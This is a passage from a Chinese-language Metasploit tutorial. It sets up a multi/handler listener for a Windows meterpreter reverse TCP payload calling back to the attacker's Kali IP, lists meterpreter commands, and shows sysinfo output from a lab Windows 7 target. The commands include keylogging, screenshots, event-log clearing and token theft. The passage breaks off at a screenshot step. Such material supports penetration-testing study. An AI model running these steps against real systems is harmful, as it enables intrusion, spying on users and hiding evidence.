

启用主控端:

```
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.152.147 set lport 5555
```

192.168.152.147 是我们 kali 的 IP 地址

命令

enumdesktops 列出所有可访问的桌面和窗口工作站

getdesktop 获取当前的 meterpreter 桌面

idletime 返回远程用户空闲的时间

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

screenshot 抓取一个交互式桌面的屏幕截图

setdesktop 改变当前的 meterpreters 桌面

uictl 控制一些用户界面组件

clearev 清除事件日志

drop_token 放弃任何活动的模拟令牌

execute 执行一个命令

getenv 获取一个或多个环境变量值

getpid 获取当前进程标识符

getprivs 尝试启用当前进程可用的所有特权

getsid 获取服务器作为其运行的用户的 SID

getuid 获取服务器作为其运行的用户

kill 终止流程

localtime 显示目标系统的本地日期和时间

pgrep 按名称筛选进程

pkill 按名称终止进程

ps 查看目标正在运行的进程

reboot 重新启动远程计算机

reg 修改远程注册表并与之交互

rev2self 在远程机器上调用 RevertToSelf()

shell 拖放到系统命令 shell 中

shutdown 关闭远程计算机

steal_token 试图从目标进程中窃取模拟令牌

suspend 挂起或恢复进程列表

sysinfo 获取有关远程系统(如操作系统)的信息

控制靶机

1.获取靶机基本信息: sysinfo

```
meterpreter > sysinfo
Computer      : WIN-GKHVREM34CA
OS           : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : zh_CN
Domain       : WORKGROUP
Logged On Users : 2
Meterpreter  : x86/windows
meterpreter >
```

2. 获取桌面截图

